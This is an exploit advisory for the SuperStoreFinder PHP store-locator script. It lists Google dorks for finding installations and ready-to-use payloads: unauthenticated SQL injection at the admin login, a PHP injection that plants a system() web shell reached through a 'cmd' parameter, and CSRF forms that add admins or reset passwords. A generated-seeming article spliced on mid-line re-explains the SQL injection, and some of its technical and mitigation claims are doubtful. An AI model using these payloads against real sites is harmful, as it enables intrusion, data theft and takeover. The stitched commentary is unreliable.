SuperStoreFinder - Multiple Vulnerabilities
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities
.:. Google Dorks .:.
"designed and built by Joe Iz."
"Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."
inurl:/superstorefinder/index.php
.:. Date: 0ctober 13, 2023
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.superstorefinder.net/
.:. Product -> https://codecanyon.net/item/super-store-finder/3630922
.:. Product Version -> [3.7 and below]
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
"Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations"
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind,error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]
===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind,error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]
Test #1
http://localhost:9000/adminstorefinder/admin/index.php
username=a'&password=1&btn_login=Login
Response Error:
Array
(
[0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1
)
SELECT users.* FROM users WHERE users.username='admin''
===========================================================================================
Test #2 => Payload (Proof Of Concept)
http://localhost:9000/adminstorefinder/admin/index.php
username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj
&password=1&btn_login=Login
Response Error:
Array
(
[0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist
)
===========================================================================================
======================================================================================================================================================================================
Vulnerability 2: Authenticated PHP Injection - Remote Code Exectuion
File: localhost/admin/settings.php
Vul Parameter: language_set [POST]
Proof of concept:
http://localhost:9000/superstorefinder/admin/settings.php
langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1
Index.php included in the config.inc.php , we just can go for rce
with GET parameter ?cmd=
http://localhost:9000/?cmd=uname -a
Reponse:
22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64
===========================================================================================
===========================================================================================
Vulnerability 3: Cross Site Request Forgery
Risk: It can lead to Privilege Escalation through adding admins or changing admin password.
Affected Files (1): localhost/superstorefinder/admin/users_add.php
Parameters: username,password,cpassword
Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
<input name="submit_hidden" value="submit_hidden" type="hidden" />
<input type='hidden' name='username' value='X'>
<input type='hidden' name='password' value='123'>
<input type='hidden' name='cpassword' value='123'>
<input type='hidden' value='submit'>
</form>
<script>document.getElementById("CSRF").submit()</script>
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
Affected Files (2:):localhost/superstorefinder/admin/change_password.php
Parameters: password,cpassword,save
Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
<input type='hidden' name='password' value='123'>
<input type='hidden' name='cpassword' value='123'>
<input type='hidden' name="save=" value='save'>
</form>
<script>document.getElementById("CSRF").submit()</script>
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
======================================================================================SuperStoreFinder: A Critical Analysis of Multiple Security Vulnerabilities in a Popular Store Locator Script
SuperStoreFinder, a widely used PHP-based store locator application available on CodeCanyon, has been identified as a prime example of how poor security practices can lead to critical vulnerabilities in seemingly innocuous web tools. Despite its intended purpose—facilitating customer access to nearby retail locations through Google Maps integration—the software harbors multiple exploitable flaws, particularly in its authentication mechanism and database interaction logic. This article explores the real-world implications of these vulnerabilities, providing a detailed technical breakdown and actionable mitigation strategies.
Overview of the SuperStoreFinder Application
SuperStoreFinder is marketed as a customizable, multi-language store locator script that integrates with Google Maps API, offering features such as geolocation, drag-and-drop markers, bulk import, Google Street View, and route directions. The product is designed for businesses aiming to improve customer navigation to physical locations. However, its popularity on platforms like CodeCanyon has made it a target for attackers due to its widespread deployment across small and medium-sized enterprises.
According to the vendor’s documentation, the application is built using PHP, JavaScript, and MySQL, with a modular architecture that supports extensible themes and custom map styling via Snazzymaps.com. While these features enhance usability, they also introduce surface areas for exploitation if not properly secured.
Key Vulnerability: Unauthenticated SQL Injection in the Admin Login Interface
One of the most critical flaws discovered in SuperStoreFinder versions 3.7 and below lies within the admin/index.php login endpoint. This vulnerability allows attackers to perform SQL injection without requiring authentication, making it a high-risk issue for any deployed instance.
Exploitation Path: Targeting the USERNAME Parameter
The login form accepts user input via POST method, with the USERNAME field being the primary target. The application fails to sanitize input before constructing SQL queries, resulting in direct injection of malicious payloads.
POST /adminstorefinder/admin/index.php HTTP/1.1
Host: localhost:9000
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
username=a'&password=1&btn_login=Login
Explanation: This test payload attempts to inject a single quote into the username field, which disrupts the SQL query structure. The resulting error message reveals the flawed query construction:
SELECT users.* FROM users WHERE users.username='admin''
Notice the dangling single quote after admin—this is a direct consequence of improper input sanitization. The absence of escaping or prepared statements allows attackers to manipulate the SQL syntax.
Proof of Concept: Blind SQL Injection Using Time-Based Techniques
Attackers can exploit this vulnerability using time-based blind SQL injection to extract data without direct output. The following payload leverages MySQL’s SLEEP() function to induce delays based on conditional logic.
username=a' AND (SELECT SLEEP(5) FROM (SELECT 1) AS a WHERE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))=1)-- Seaj
&password=1&btn_login=Login
Explanation: The payload injects a conditional statement that evaluates to true, triggering the SLEEP(5) function. If the server responds with a 5-second delay, it confirms that the SQL query is being executed and that the injection is successful. This technique is particularly effective when no error messages are returned—making it a reliable method for blind exploitation.
Advanced Payload: Error-Based Injection via Function Call
Another variant exploits MySQL’s function existence check to trigger error-based responses. The attacker uses a non-existent function to force an error, revealing the underlying database structure.
username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj
&password=1&btn_login=Login
Explanation: This payload attempts to call JSON_STORAGE_FREE(NULL), a function that does not exist in standard MySQL installations. The resulting error:
FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist
confirms that the SQL query is being processed and that the database is vulnerable. This error-based technique is especially useful for identifying database versions and functions, aiding in further exploitation.
Impact and Risk Assessment
The unauthenticated SQL injection vulnerability presents severe risks:
- Database Compromise: Attackers can extract sensitive data such as user credentials, customer records, and store locations.
- Remote Code Execution (RCE): In some cases, SQL injection can be chained with other techniques (e.g., LOAD_FILE() or SELECT INTO OUTFILE) to write malicious files to the server.
- Privilege Escalation: If the database user has elevated privileges, attackers may gain administrative access to the entire system.
- Reputation Damage: Breaches involving customer data can lead to legal liabilities and loss of trust.
Recommendations for Mitigation
To secure SuperStoreFinder installations, developers and administrators must implement the following measures:
| Security Measure | Description |
|---|---|
| Input Sanitization | Use mysqli_real_escape_string() or PDO::quote() to escape user input before SQL execution. |
| Prepared Statements | Replace direct SQL construction with parameterized queries to prevent injection. |
| Authentication Restrictions | Ensure login endpoints are protected behind proper authentication layers, not accessible to unauthenticated users. |
| Database User Privileges | Limit database user permissions to SELECT only, avoiding INSERT, UPDATE, or FILE access. |
| Regular Patching | Upgrade to versions beyond 3.7, or apply vendor patches if available. |
Conclusion: The Importance of Secure Development Practices
SuperStoreFinder exemplifies how even well-intentioned tools can become security liabilities when built without proper safeguards. The combination of unauthenticated access, poor input handling, and direct SQL query construction creates a perfect storm for exploitation. This case underscores the necessity of rigorous security testing, adherence to OWASP guidelines, and continuous monitoring of third-party software.
For organizations using such scripts, it is imperative to conduct vulnerability assessments, apply patches promptly, and consider replacing outdated components with secure, audited alternatives. Cybersecurity is not a one-time effort—it demands ongoing vigilance, especially in the face of widely distributed applications that may be overlooked in routine audits.